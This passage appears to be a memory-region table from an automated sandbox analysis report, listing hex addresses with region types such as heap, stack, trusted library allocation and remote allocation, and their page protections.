trusted library allocation
|
page read and write
|
||
4A7E000
|
trusted library allocation
|
page read and write
|
||
4ABB000
|
trusted library allocation
|
page read and write
|
||
8082000
|
trusted library allocation
|
page read and write
|
||
70F000
|
heap
|
page read and write
|
||
4DEB000
|
trusted library allocation
|
page read and write
|
||
DCE000
|
stack
|
page read and write
|
||
691B000
|
stack
|
page read and write
|
||
24EB000
|
trusted library allocation
|
page execute and read and write
|
||
B00000
|
trusted library allocation
|
page read and write
|
||
6930000
|
heap
|
page read and write
|
||
2550000
|
heap
|
page execute and read and write
|
||
4B6D000
|
trusted library allocation
|
page read and write
|
||
4AC2000
|
trusted library allocation
|
page read and write
|
||
6620000
|
heap
|
page read and write
|
||
4D04000
|
trusted library allocation
|
page read and write
|
||
54FD000
|
stack
|
page read and write
|
||
B223A79000
|
stack
|
page read and write
|
||
4DCD000
|
trusted library allocation
|
page read and write
|
||
7BCE000
|
stack
|
page read and write
|
||
D5B000
|
trusted library allocation
|
page execute and read and write
|
||
4BF5000
|
trusted library allocation
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
4F10000
|
trusted library allocation
|
page read and write
|
||
68FE000
|
stack
|
page read and write
|
||
4B4B000
|
trusted library allocation
|
page read and write
|
||
4AA8000
|
trusted library allocation
|
page read and write
|
||
6B4E000
|
stack
|
page read and write
|
||
5659000
|
trusted library allocation
|
page read and write
|
||
4CC1000
|
trusted library allocation
|
page read and write
|
||
4F4B000
|
trusted library allocation
|
page read and write
|
||
4096000
|
trusted library allocation
|
page execute and read and write
|
||
4D30000
|
trusted library allocation
|
page read and write
|
||
4ED4000
|
trusted library allocation
|
page read and write
|
||
4A95000
|
trusted library allocation
|
page read and write
|
||
8120000
|
trusted library allocation
|
page read and write
|
||
4B95000
|
trusted library allocation
|
page read and write
|
||
4B1E000
|
trusted library allocation
|
page read and write
|
||
691B000
|
stack
|
page read and write
|
||
CA8000
|
unkown
|
page execute read
|
||
7EE0000
|
trusted library allocation
|
page read and write
|
||
4B55000
|
trusted library allocation
|
page read and write
|
||
4A8A000
|
trusted library allocation
|
page read and write
|
||
476C000
|
stack
|
page read and write
|
||
4D9E000
|
trusted library allocation
|
page read and write
|
||
A42000
|
unkown
|
page readonly
|
||
468E000
|
stack
|
page read and write
|
||
5E5E000
|
stack
|
page read and write
|
||
22526B1A000
|
heap
|
page read and write
|
||
4F62000
|
trusted library allocation
|
page read and write
|
||
4E8B000
|
trusted library allocation
|
page read and write
|
||
4AC0000
|
trusted library allocation
|
page read and write
|
||
82E0000
|
trusted library allocation
|
page read and write
|
||
7FFB1E870000
|
unkown
|
page read and write
|
||
AF7000
|
heap
|
page read and write
|
||
4C5B000
|
trusted library allocation
|
page read and write
|
||
5D02000
|
heap
|
page read and write
|
||
4FA8000
|
trusted library allocation
|
page read and write
|
||
4AA1000
|
trusted library allocation
|
page read and write
|
||
4ECA000
|
trusted library allocation
|
page read and write
|
||
7DB6000
|
heap
|
page read and write
|
||
4AE8000
|
trusted library allocation
|
page read and write
|
||
663E000
|
stack
|
page read and write
|
||
4C43000
|
trusted library allocation
|
page read and write
|
||
8AB0000
|
trusted library allocation
|
page execute and read and write
|
||
15C5000
|
trusted library allocation
|
page read and write
|
||
6FBAD000
|
unkown
|
page read and write
|
||
D4A000
|
trusted library allocation
|
page execute and read and write
|
||
5507000
|
trusted library allocation
|
page read and write
|
||
4632000
|
trusted library allocation
|
page read and write
|
||
7060000
|
trusted library allocation
|
page read and write
|
||
5D00000
|
heap
|
page read and write
|
||
B30000
|
trusted library allocation
|
page read and write
|
||
4AA3000
|
trusted library allocation
|
page read and write
|
||
4CC3000
|
trusted library allocation
|
page read and write
|
||
681E000
|
stack
|
page read and write
|
||
7FFB1E850000
|
unkown
|
page readonly
|
||
4E94000
|
trusted library allocation
|
page read and write
|
||
4B9A000
|
trusted library allocation
|
page read and write
|
||
69F0000
|
trusted library allocation
|
page read and write
|
||
66A000
|
stack
|
page read and write
|
||
2719000
|
trusted library allocation
|
page read and write
|
||
802D000
|
trusted library allocation
|
page read and write
|
||
6FE0000
|
trusted library allocation
|
page read and write
|
||
4CEC000
|
trusted library allocation
|
page read and write
|
||
4A1C000
|
trusted library allocation
|
page read and write
|
||
4F70000
|
trusted library allocation
|
page read and write
|
||
4D2E000
|
trusted library allocation
|
page read and write
|
||
4BF7000
|
trusted library allocation
|
page read and write
|
||
4060000
|
trusted library allocation
|
page read and write
|
||
7A0000
|
remote allocation
|
page execute and read and write
|
||
49F3000
|
trusted library allocation
|
page read and write
|
||
4DB7000
|
trusted library allocation
|
page read and write
|
||
4D68000
|
trusted library allocation
|
page read and write
|
||
4A0E000
|
trusted library allocation
|
page read and write
|
||
45C0000
|
heap
|
page execute and read and write
|
||
7A0000
|
heap
|
page read and write
|
||
B8F000
|
heap
|
page read and write
|
||
B36000
|
trusted library allocation
|
page execute and read and write
|
||
4A9B000
|
trusted library allocation
|
page read and write
|
||
7080000
|
trusted library allocation
|
page read and write
|
||
5D04000
|
heap
|
page read and write
|
||
4B69000
|
trusted library allocation
|
page read and write
|
||
BDE000
|
stack
|
page read and write
|
||
C0D000
|
trusted library allocation
|
page execute and read and write
|
||
4E1B000
|
trusted library allocation
|
page read and write
|
||
4F51000
|
trusted library allocation
|
page read and write
|
||
4CD5000
|
trusted library allocation
|
page read and write
|
||
6F07000
|
trusted library allocation
|
page read and write
|
||
8000000
|
trusted library allocation
|
page read and write
|
||
4F7E000
|
trusted library allocation
|
page read and write
|
||
4F13000
|
trusted library allocation
|
page read and write
|
||
8020000
|
trusted library allocation
|
page read and write
|
||
4AA9000
|
trusted library allocation
|
page read and write
|
||
65F000
|
heap
|
page read and write
|
||
4ADE000
|
trusted library allocation
|
page read and write
|
||
7040000
|
trusted library allocation
|
page read and write
|
||
4F4E000
|
trusted library allocation
|
page read and write
|
||
636B000
|
trusted library allocation
|
page read and write
|
||
4F6A000
|
trusted library allocation
|
page read and write
|
||
1633000
|
heap
|
page read and write
|
||
B223B7F000
|
stack
|
page read and write
|
||
4D10000
|
trusted library allocation
|
page read and write
|
||
4A0C000
|
trusted library allocation
|
page read and write
|
||
B13000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB1E851000
|
unkown
|
page execute read
|
||
4F58000
|
trusted library allocation
|
page read and write
|
||
4D72000
|
trusted library allocation
|
page read and write
|
||
4CCE000
|
trusted library allocation
|
page read and write
|
||
4D4D000
|
trusted library allocation
|
page read and write
|
||
C27000
|
heap
|
page read and write
|
||
4E01000
|
trusted library allocation
|
page read and write
|
||
2570000
|
trusted library allocation
|
page read and write
|
||
4A18000
|
trusted library allocation
|
page read and write
|
||
4A5E000
|
trusted library allocation
|
page read and write
|
||
4C12000
|
trusted library allocation
|
page read and write
|
||
ADB48FE000
|
stack
|
page read and write
|
||
2C41000
|
trusted library allocation
|
page read and write
|
||
689A000
|
stack
|
page read and write
|
||
AEF000
|
stack
|
page read and write
|
||
4ABD000
|
trusted library allocation
|
page read and write
|
||
4BF4000
|
heap
|
page read and write
|
||
EDE000
|
stack
|
page read and write
|
||
4C78000
|
trusted library allocation
|
page read and write
|
||
88F2319000
|
stack
|
page read and write
|
||
7010000
|
trusted library allocation
|
page read and write
|
||
49F7000
|
trusted library allocation
|
page read and write
|
||
4B97000
|
trusted library allocation
|
page read and write
|
||
D2D000
|
trusted library allocation
|
page execute and read and write
|
||
7C30000
|
heap
|
page read and write
|
||
4B4C000
|
trusted library allocation
|
page read and write
|
||
6FC0000
|
trusted library allocation
|
page read and write
|
||
62FE000
|
stack
|
page read and write
|
||
6FBAD000
|
unkown
|
page read and write
|
||
4B72000
|
trusted library allocation
|
page read and write
|
||
850000
|
heap
|
page read and write
|
||
4D4B000
|
trusted library allocation
|
page read and write
|
||
7CDA000
|
trusted library allocation
|
page read and write
|
||
719C000
|
stack
|
page read and write
|
||
4E47000
|
trusted library allocation
|
page read and write
|
||
62B0000
|
trusted library allocation
|
page execute and read and write
|
||
15DD000
|
trusted library allocation
|
page read and write
|
||
8B99CFF000
|
stack
|
page read and write
|
||
644C000
|
trusted library allocation
|
page read and write
|
||
459E000
|
stack
|
page read and write
|
||
56B7000
|
trusted library allocation
|
page read and write
|
||
4E16000
|
trusted library allocation
|
page read and write
|
||
D52000
|
trusted library allocation
|
page read and write
|
||
512E000
|
stack
|
page read and write
|
||
4AAB000
|
trusted library allocation
|
page read and write
|
||
5E77000
|
trusted library allocation
|
page read and write
|
||
4B10000
|
trusted library allocation
|
page read and write
|
||
4F6E000
|
trusted library allocation
|
page read and write
|
||
4EFA000
|
trusted library allocation
|
page read and write
|
||
4B42000
|
trusted library allocation
|
page read and write
|
||
4C55000
|
trusted library allocation
|
page read and write
|
||
4EA8000
|
trusted library allocation
|
page read and write
|
||
4B65000
|
trusted library allocation
|
page read and write
|
||
8092000
|
trusted library allocation
|
page read and write
|
||
4B55000
|
trusted library allocation
|
page read and write
|
||
1A8000
|
stack
|
page read and write
|
||
708D000
|
stack
|
page read and write
|
||
4F56000
|
trusted library allocation
|
page read and write
|
||
4C1F000
|
trusted library allocation
|
page read and write
|
||
486E000
|
stack
|
page read and write
|
||
4070000
|
trusted library allocation
|
page read and write
|
||
15B6000
|
trusted library allocation
|
page read and write
|
||
4B63000
|
trusted library allocation
|
page read and write
|
||
4A10000
|
trusted library allocation
|
page read and write
|
||
4A29000
|
trusted library allocation
|
page read and write
|
||
68DD000
|
stack
|
page read and write
|
||
4A6B000
|
trusted library allocation
|
page read and write
|
||
4E5B000
|
trusted library allocation
|
page read and write
|
||
4B9B000
|
trusted library allocation
|
page read and write
|
||
4F02000
|
trusted library allocation
|
page read and write
|
||
6D1000
|
heap
|
page read and write
|
||
6280000
|
trusted library allocation
|
page read and write
|
||
4BC5000
|
trusted library allocation
|
page read and write
|
||
6FBAD000
|
unkown
|
page read and write
|
||
4BAE000
|
trusted library allocation
|
page read and write
|
||
62BE000
|
stack
|
page read and write
|
||
4BE7000
|
trusted library allocation
|
page read and write
|
||
6ECE000
|
stack
|
page read and write
|
||
D57000
|
trusted library allocation
|
page execute and read and write
|
||
552D000
|
trusted library allocation
|
page read and write
|
||
4E83000
|
trusted library allocation
|
page read and write
|
||
4D2F000
|
trusted library allocation
|
page read and write
|
||
2580000
|
heap
|
page read and write
|
||
4C40000
|
trusted library allocation
|
page read and write
|
||
88F239E000
|
stack
|
page read and write
|
||
4A75000
|
trusted library allocation
|
page read and write
|
||
60D0000
|
trusted library allocation
|
page read and write
|
||
26EA000
|
trusted library allocation
|
page read and write
|
||
4D08000
|
trusted library allocation
|
page read and write
|
||
4D6B000
|
trusted library allocation
|
page read and write
|
||
410B000
|
heap
|
page read and write
|
||
4AF2000
|
trusted library allocation
|
page read and write
|
||
4E76000
|
trusted library allocation
|
page read and write
|
||
4BA4000
|
trusted library allocation
|
page read and write
|
||
4C49000
|
trusted library allocation
|
page read and write
|
||
25653560000
|
heap
|
page read and write
|
||
4F22000
|
trusted library allocation
|
page read and write
|
||
6FBAD000
|
unkown
|
page read and write
|
||
806B000
|
trusted library allocation
|
page read and write
|
||
4DCF000
|
trusted library allocation
|
page read and write
|
||
537000
|
heap
|
page read and write
|
||
4DF3000
|
trusted library allocation
|
page read and write
|
||
5D19000
|
heap
|
page read and write
|
||
4BDE000
|
trusted library allocation
|
page read and write
|
||
4B16000
|
trusted library allocation
|
page read and write
|
||
5D3D000
|
heap
|
page read and write
|
||
25E80850000
|
heap
|
page read and write
|
||
40A0000
|
trusted library allocation
|
page read and write
|
||
25653760000
|
heap
|
page read and write
|
||
8EF0000
|
trusted library allocation
|
page execute and read and write
|
||
5E60000
|
trusted library allocation
|
page read and write
|
||
4CFE000
|
trusted library allocation
|
page read and write
|
||
D24000
|
trusted library allocation
|
page read and write
|
||
2089CE6B000
|
heap
|
page read and write
|
||
4D76000
|
trusted library allocation
|
page read and write
|
||
4A8C000
|
trusted library allocation
|
page read and write
|
||
4D64000
|
trusted library allocation
|
page read and write
|
||
60E000
|
stack
|
page read and write
|
||
8BD0000
|
heap
|
page read and write
|
||
24E2000
|
trusted library allocation
|
page read and write
|
||
4B16000
|
trusted library allocation
|
page read and write
|
||
675D000
|
stack
|
page read and write
|
||
A90000
|
trusted library allocation
|
page read and write
|
||
4B6F000
|
trusted library allocation
|
page read and write
|
||
8260000
|
trusted library allocation
|
page read and write
|
||
4700000
|
trusted library allocation
|
page read and write
|
||
4D5D000
|
trusted library allocation
|
page read and write
|
||
4F25000
|
trusted library allocation
|
page read and write
|
||
4A8E000
|
trusted library allocation
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
4A88000
|
trusted library allocation
|
page read and write
|
||
B20000
|
trusted library allocation
|
page read and write
|
||
4BA1000
|
trusted library allocation
|
page read and write
|
||
418E000
|
stack
|
page read and write
|
||
4AE6000
|
trusted library allocation
|
page read and write
|
||
4B33000
|
trusted library allocation
|
page read and write
|
||
5510000
|
trusted library allocation
|
page read and write
|
||
2C9C000
|
trusted library allocation
|
page read and write
|
||
4B87000
|
trusted library allocation
|
page read and write
|
||
65B0000
|
trusted library allocation
|
page execute and read and write
|
||
6BCE000
|
stack
|
page read and write
|
||
4A16000
|
trusted library allocation
|
page read and write
|
||
4698000
|
trusted library allocation
|
page read and write
|
||
4D40000
|
heap
|
page read and write
|
||
4A67000
|
trusted library allocation
|
page read and write
|
||
4E85000
|
trusted library allocation
|
page read and write
|
||
22526A20000
|
heap
|
page read and write
|
||
6A30000
|
trusted library allocation
|
page execute and read and write
|
||
5500000
|
trusted library allocation
|
page read and write
|
||
4B91000
|
trusted library allocation
|
page read and write
|
||
752000
|
heap
|
page read and write
|
||
8290000
|
trusted library allocation
|
page read and write
|
||
4EB5000
|
trusted library allocation
|
page read and write
|
||
4AC6000
|
trusted library allocation
|
page read and write
|
||
4F6C000
|
trusted library allocation
|
page read and write
|
||
4A6D000
|
trusted library allocation
|
page read and write
|
||
4CD2000
|
trusted library allocation
|
page read and write
|
||
4D55000
|
trusted library allocation
|
page read and write
|
||
8140000
|
heap
|
page read and write
|
||
4DF1000
|
trusted library allocation
|
page read and write
|
||
7A80000
|
trusted library allocation
|
page read and write
|
||
4B48000
|
trusted library allocation
|
page read and write
|
||
4C6D000
|
trusted library allocation
|
page read and write
|
||
4F00000
|
trusted library allocation
|
page read and write
|
||
4F40000
|
trusted library allocation
|
page read and write
|
||
7B60000
|
trusted library allocation
|
page read and write
|
||
25653550000
|
heap
|
page read and write
|
||
4B76000
|
trusted library allocation
|
page read and write
|
||
4DDE000
|
trusted library allocation
|
page read and write
|
||
4B68000
|
trusted library allocation
|
page read and write
|
||
4CB9000
|
trusted library allocation
|
page read and write
|
||
4EF5000
|
trusted library allocation
|
page read and write
|
||
4D49000
|
trusted library allocation
|
page read and write
|
||
4CD2000
|
trusted library allocation
|
page read and write
|
||
4D25000
|
trusted library allocation
|
page read and write
|
||
4EBF000
|
trusted library allocation
|
page read and write
|
||
5BAB000
|
stack
|
page read and write
|
||
D30000
|
trusted library allocation
|
page read and write
|
||
B60000
|
trusted library allocation
|
page read and write
|
||
6FB90000
|
unkown
|
page readonly
|
||
4EED000
|
trusted library allocation
|
page read and write
|
||
4BC9000
|
trusted library allocation
|
page read and write
|
||
4EEB000
|
trusted library allocation
|
page read and write
|
||
4092000
|
trusted library allocation
|
page read and write
|
||
26F4000
|
trusted library allocation
|
page read and write
|
||
2CAF000
|
trusted library allocation
|
page read and write
|
||
6A30000
|
heap
|
page read and write
|
||
5C1D000
|
stack
|
page read and write
|
||
5679000
|
trusted library allocation
|
page read and write
|
||
2565359A000
|
heap
|
page read and write
|
||
667E000
|
stack
|
page read and write
|
||
5CE0000
|
heap
|
page read and write
|
||
5523000
|
trusted library allocation
|
page read and write
|
||
4A84000
|
trusted library allocation
|
page read and write
|
||
49FF000
|
trusted library allocation
|
page read and write
|
||
148C000
|
stack
|
page read and write
|
||
A9E000
|
stack
|
page read and write
|
||
4BB0000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
4F50000
|
trusted library allocation
|
page read and write
|
||
4FC5000
|
trusted library allocation
|
page read and write
|
||
7B50000
|
trusted library allocation
|
page read and write
|
||
4D3A000
|
trusted library allocation
|
page read and write
|
||
63FE000
|
stack
|
page read and write
|
||
4B76000
|
trusted library allocation
|
page read and write
|
||
460E000
|
stack
|
page read and write
|
||
4E40000
|
trusted library allocation
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
4C5D000
|
trusted library allocation
|
page read and write
|
||
4F66000
|
trusted library allocation
|
page read and write
|
||
BBD000
|
heap
|
page read and write
|
||
4CAE000
|
trusted library allocation
|
page read and write
|
||
4EA9000
|
trusted library allocation
|
page read and write
|
||
C10000
|
trusted library allocation
|
page read and write
|
||
8270000
|
trusted library allocation
|
page read and write
|
||
4C51000
|
trusted library allocation
|
page read and write
|
||
4AF8000
|
trusted library allocation
|
page read and write
|
||
6EF0000
|
trusted library allocation
|
page execute and read and write
|
||
229C73D0000
|
heap
|
page read and write
|
||
4E1D000
|
trusted library allocation
|
page read and write
|
||
4B80000
|
trusted library allocation
|
page read and write
|
||
7AED000
|
stack
|
page read and write
|
||
B32000
|
trusted library allocation
|
page read and write
|
||
4B61000
|
trusted library allocation
|
page read and write
|
||
4AB2000
|
trusted library allocation
|
page read and write
|
||
4D36000
|
trusted library allocation
|
page read and write
|
||
7FBD0000
|
trusted library allocation
|
page execute and read and write
|
||
8BF5000
|
heap
|
page read and write
|
||
4DE0000
|
trusted library allocation
|
page read and write
|
||
4FBD000
|
trusted library allocation
|
page read and write
|
||
70A0000
|
trusted library allocation
|
page read and write
|
||
4A2D000
|
trusted library allocation
|
page read and write
|
||
4BE0000
|
trusted library allocation
|
page read and write
|
||
4DB2000
|
trusted library allocation
|
page read and write
|
||
451E000
|
stack
|
page read and write
|
||
4D57000
|
trusted library allocation
|
page read and write
|
||
4BF9000
|
trusted library allocation
|
page read and write
|
||
6C1E000
|
stack
|
page read and write
|
||
79A000
|
heap
|
page read and write
|
||
4090000
|
trusted library allocation
|
page read and write
|
||
CB1000
|
unkown
|
page read and write
|
||
2CBD000
|
trusted library allocation
|
page read and write
|
||
4C16000
|
trusted library allocation
|
page read and write
|
||
4B50000
|
trusted library allocation
|
page read and write
|
||
460F000
|
stack
|
page read and write
|
||
4FA4000
|
trusted library allocation
|
page read and write
|
||
B40000
|
trusted library allocation
|
page read and write
|
||
4BAC000
|
trusted library allocation
|
page read and write
|
||
6F80000
|
trusted library allocation
|
page read and write
|
||
4D14000
|
trusted library allocation
|
page read and write
|
||
4D0B000
|
trusted library allocation
|
page read and write
|
||
5FD0000
|
trusted library allocation
|
page execute and read and write
|
||
4A5F000
|
trusted library allocation
|
page read and write
|
||
40A5000
|
trusted library allocation
|
page execute and read and write
|
||
6FE000
|
heap
|
page read and write
|
||
80E000
|
stack
|
page read and write
|
||
52AD000
|
stack
|
page read and write
|
||
24E7000
|
trusted library allocation
|
page execute and read and write
|
||
4F2A000
|
trusted library allocation
|
page read and write
|
||
89E000
|
stack
|
page read and write
|
||
7B70000
|
trusted library allocation
|
page read and write
|
||
4BB5000
|
trusted library allocation
|
page read and write
|
||
4F7C000
|
trusted library allocation
|
page read and write
|
||
4E18000
|
trusted library allocation
|
page read and write
|
||
4B87000
|
trusted library allocation
|
page read and write
|
||
6E70000
|
trusted library allocation
|
page read and write
|
||
268E000
|
stack
|
page read and write
|
||
4EAF000
|
trusted library allocation
|
page read and write
|
||
7BF0000
|
heap
|
page read and write
|
||
7A56000
|
stack
|
page read and write
|
||
25E806B1000
|
heap
|
page read and write
|
||
5DE000
|
stack
|
page read and write
|
||
4F26000
|
trusted library allocation
|
page read and write
|
||
4AF4000
|
trusted library allocation
|
page read and write
|
||
4E5D000
|
trusted library allocation
|
page read and write
|
||
4CA8000
|
trusted library allocation
|
page read and write
|
||
4D43000
|
heap
|
page read and write
|
||
7B40000
|
trusted library allocation
|
page execute and read and write
|
||
ADB41FE000
|
stack
|
page read and write
|
||
4AF7000
|
trusted library allocation
|
page read and write
|
||
4ACF000
|
trusted library allocation
|
page read and write
|
||
4F72000
|
trusted library allocation
|
page read and write
|
||
65FD000
|
stack
|
page read and write
|
||
67DE000
|
stack
|
page read and write
|
||
4D92000
|
heap
|
page read and write
|
||
699B000
|
stack
|
page read and write
|
||
4EAA000
|
trusted library allocation
|
page read and write
|
||
6290000
|
heap
|
page read and write
|
||
C1D000
|
trusted library allocation
|
page execute and read and write
|
||
4BDA000
|
trusted library allocation
|
page read and write
|
||
5D78000
|
heap
|
page read and write
|
||
AF0000
|
trusted library section
|
page read and write
|
||
6CA000
|
heap
|
page read and write
|
||
7BE0000
|
trusted library allocation
|
page read and write
|
||
4AFD000
|
trusted library allocation
|
page read and write
|
||
4D21000
|
trusted library allocation
|
page read and write
|
||
4C0A000
|
trusted library allocation
|
page read and write
|
||
4C59000
|
trusted library allocation
|
page read and write
|
||
158D000
|
stack
|
page read and write
|
||
6F8D000
|
stack
|
page read and write
|
||
6366000
|
trusted library allocation
|
page read and write
|
||
4B35000
|
trusted library allocation
|
page read and write
|
||
4FCC000
|
stack
|
page read and write
|
||
4D29000
|
trusted library allocation
|
page read and write
|
||
5EFE000
|
stack
|
page read and write
|
||
2500000
|
trusted library allocation
|
page read and write
|
||
4BC5000
|
trusted library allocation
|
page read and write
|
||
6C0000
|
heap
|
page read and write
|
||
7B50000
|
trusted library allocation
|
page read and write
|
||
4ED4000
|
trusted library allocation
|
page read and write
|
||
E91997E000
|
stack
|
page read and write
|
||
4A5A000
|
trusted library allocation
|
page read and write
|
||
BCB000
|
heap
|
page read and write
|
||
4DFF000
|
trusted library allocation
|
page read and write
|
||
6DCF000
|
heap
|
page read and write
|
||
4F38000
|
trusted library allocation
|
page read and write
|
||
7BEE000
|
trusted library allocation
|
page read and write
|
||
4DEA000
|
heap
|
page read and write
|
||
4FBF000
|
trusted library allocation
|
page read and write
|
||
4D15000
|
trusted library allocation
|
page read and write
|
||
8080000
|
trusted library allocation
|
page read and write
|
||
4EEB000
|
trusted library allocation
|
page read and write
|
||
8C1F000
|
heap
|
page read and write
|
||
621D000
|
stack
|
page read and write
|
||
4AB4000
|
trusted library allocation
|
page read and write
|
||
4E43000
|
trusted library allocation
|
page read and write
|
||
70CC000
|
stack
|
page read and write
|
||
689E000
|
stack
|
page read and write
|
||
4F44000
|
trusted library allocation
|
page read and write
|
||
4FAF000
|
trusted library allocation
|
page read and write
|
||
4D5B000
|
trusted library allocation
|
page read and write
|
||
59AE000
|
stack
|
page read and write
|
||
4B7A000
|
trusted library allocation
|
page read and write
|
||
4EEF000
|
trusted library allocation
|
page read and write
|
||
4CA0000
|
trusted library allocation
|
page read and write
|
||
4AD7000
|
trusted library allocation
|
page read and write
|
||
4DA4000
|
trusted library allocation
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
4D87000
|
trusted library allocation
|
page read and write
|
||
4DC1000
|
trusted library allocation
|
page read and write
|
||
4B38000
|
trusted library allocation
|
page read and write
|
||
4EA2000
|
trusted library allocation
|
page read and write
|
||
6F40000
|
trusted library allocation
|
page read and write
|
||
1410000
|
trusted library allocation
|
page execute and read and write
|
||
4A73000
|
trusted library allocation
|
page read and write
|
||
4DCB000
|
trusted library allocation
|
page read and write
|
||
4E8D000
|
trusted library allocation
|
page read and write
|
||
4F98000
|
trusted library allocation
|
page read and write
|
||
7FD10000
|
trusted library allocation
|
page execute and read and write
|
||
70D0000
|
trusted library allocation
|
page read and write
|
||
4AAA000
|
trusted library allocation
|
page read and write
|
||
4C60000
|
trusted library allocation
|
page read and write
|
||
3691000
|
trusted library allocation
|
page read and write
|
||
4E7A000
|
trusted library allocation
|
page read and write
|
||
4D2D000
|
trusted library allocation
|
page read and write
|
||
7B60000
|
trusted library allocation
|
page read and write
|
||
409A000
|
trusted library allocation
|
page execute and read and write
|
||
6C9F000
|
stack
|
page read and write
|
||
25E80650000
|
heap
|
page read and write
|
||
4D00000
|
trusted library allocation
|
page read and write
|
||
4A91000
|
trusted library allocation
|
page read and write
|
||
15C2000
|
trusted library allocation
|
page read and write
|
||
C6B000
|
heap
|
page read and write
|
||
26FF000
|
trusted library allocation
|
page read and write
|
||
82A0000
|
heap
|
page execute and read and write
|
||
4A6F000
|
trusted library allocation
|
page read and write
|
||
4B05000
|
trusted library allocation
|
page read and write
|
||
70C0000
|
trusted library allocation
|
page read and write
|
||
4F74000
|
trusted library allocation
|
page read and write
|
||
4FB3000
|
trusted library allocation
|
page read and write
|
||
4EBB000
|
trusted library allocation
|
page read and write
|
||
B42000
|
trusted library allocation
|
page read and write
|
||
4D61000
|
trusted library allocation
|
page read and write
|
||
4AD1000
|
trusted library allocation
|
page read and write
|
||
CA1000
|
unkown
|
page execute read
|
||
2089CC27000
|
heap
|
page read and write
|
||
4BAE000
|
trusted library allocation
|
page read and write
|
||
CA0000
|
unkown
|
page readonly
|
||
6E13000
|
heap
|
page read and write
|
||
4D68000
|
heap
|
page read and write
|
||
4BB0000
|
trusted library allocation
|
page read and write
|
||
6FA0000
|
trusted library allocation
|
page read and write
|
||
4CFA000
|
trusted library allocation
|
page read and write
|
||
8F11000
|
trusted library allocation
|
page read and write
|
||
4FAC000
|
trusted library allocation
|
page read and write
|
||
6DC2000
|
heap
|
page read and write
|
||
4B44000
|
trusted library allocation
|
page read and write
|
||
25653590000
|
heap
|
page read and write
|
||
44DE000
|
stack
|
page read and write
|
||
4C9E000
|
trusted library allocation
|
page read and write
|
||
15F4000
|
trusted library allocation
|
page read and write
|
||
4EC3000
|
trusted library allocation
|
page read and write
|
||
4ECE000
|
trusted library allocation
|
page read and write
|
||
4F42000
|
trusted library allocation
|
page read and write
|
||
4040000
|
trusted library section
|
page read and write
|
||
6D31000
|
heap
|
page read and write
|
||
4DFD000
|
trusted library allocation
|
page read and write
|
||
229C7774000
|
heap
|
page read and write
|
||
70B0000
|
trusted library allocation
|
page read and write
|
||
64EF000
|
trusted library allocation
|
page read and write
|
||
4B5F000
|
trusted library allocation
|
page read and write
|
||
67BE000
|
stack
|
page read and write
|
||
8A7000
|
heap
|
page read and write
|
||
1720000
|
trusted library allocation
|
page read and write
|
||
4ED6000
|
trusted library allocation
|
page read and write
|
||
4DC3000
|
heap
|
page read and write
|
||
7DE6000
|
heap
|
page read and write
|
||
7DEC000
|
heap
|
page read and write
|
||
B29000
|
trusted library allocation
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page execute and read and write
|
||
4A49000
|
trusted library allocation
|
page read and write
|
||
229C7560000
|
heap
|
page read and write
|
||
8280000
|
trusted library allocation
|
page read and write
|
||
AA0000
|
heap
|
page read and write
|
||
4CA4000
|
trusted library allocation
|
page read and write
|
||
671E000
|
stack
|
page read and write
|
||
4D51000
|
trusted library allocation
|
page read and write
|
||
4DA6000
|
trusted library allocation
|
page read and write
|
||
6F10000
|
trusted library allocation
|
page read and write
|
||
4AF6000
|
trusted library allocation
|
page read and write
|
||
C0E000
|
stack
|
page read and write
|
||
56A9000
|
trusted library allocation
|
page read and write
|
||
4F91000
|
trusted library allocation
|
page read and write
|
||
4E53000
|
trusted library allocation
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
4E9E000
|
trusted library allocation
|
page read and write
|
||
4ACD000
|
trusted library allocation
|
page read and write
|
||
7A70000
|
trusted library allocation
|
page read and write
|
||
6D45000
|
heap
|
page read and write
|
||
81A0000
|
trusted library allocation
|
page execute and read and write
|
||
4B20000
|
trusted library allocation
|
page read and write
|
||
7140000
|
trusted library allocation
|
page read and write
|
||
1600000
|
trusted library allocation
|
page read and write
|
||
4A42000
|
trusted library allocation
|
page read and write
|
||
2CC9000
|
trusted library allocation
|
page read and write
|
||
4D3B000
|
trusted library allocation
|
page read and write
|
||
C67000
|
heap
|
page read and write
|
||
D80000
|
heap
|
page execute and read and write
|
||
A41000
|
unkown
|
page write copy
|
||
4BC7000
|
trusted library allocation
|
page read and write
|
||
62B000
|
heap
|
page read and write
|
||
456E000
|
stack
|
page read and write
|
||
57F000
|
stack
|
page read and write
|
||
4080000
|
trusted library allocation
|
page read and write
|
||
703000
|
heap
|
page read and write
|
||
4EF3000
|
trusted library allocation
|
page read and write
|
||
4F4C000
|
trusted library allocation
|
page read and write
|
||
67AD000
|
stack
|
page read and write
|
||
229C74B0000
|
heap
|
page read and write
|
||
4B48000
|
trusted library allocation
|
page read and write
|
||
4EBD000
|
trusted library allocation
|
page read and write
|
||
408D000
|
trusted library allocation
|
page execute and read and write
|
||
4A69000
|
trusted library allocation
|
page read and write
|
||
4C76000
|
trusted library allocation
|
page read and write
|
||
5E80000
|
trusted library allocation
|
page read and write
|
||
4B82000
|
trusted library allocation
|
page read and write
|
||
414E000
|
stack
|
page read and write
|
||
4AF5000
|
trusted library allocation
|
page read and write
|
||
4EAC000
|
trusted library allocation
|
page read and write
|
||
4D5F000
|
trusted library allocation
|
page read and write
|
||
22526B18000
|
heap
|
page read and write
|
||
5D16000
|
heap
|
page read and write
|
||
4C68000
|
trusted library allocation
|
page read and write
|
||
4ED2000
|
trusted library allocation
|
page read and write
|
||
6F4E000
|
stack
|
page read and write
|
||
8B70000
|
trusted library allocation
|
page execute and read and write
|
||
229C756C000
|
heap
|
page read and write
|
||
4B4D000
|
trusted library allocation
|
page read and write
|
||
6D41000
|
heap
|
page read and write
|
||
4DE5000
|
trusted library allocation
|
page read and write
|
||
4DAA000
|
trusted library allocation
|
page read and write
|
||
2089E6B0000
|
heap
|
page read and write
|
||
4A65000
|
trusted library allocation
|
page read and write
|
||
8C70000
|
trusted library allocation
|
page execute and read and write
|
||
4D85000
|
trusted library allocation
|
page read and write
|
||
4F0C000
|
trusted library allocation
|
page read and write
|
||
4B3A000
|
trusted library allocation
|
page read and write
|
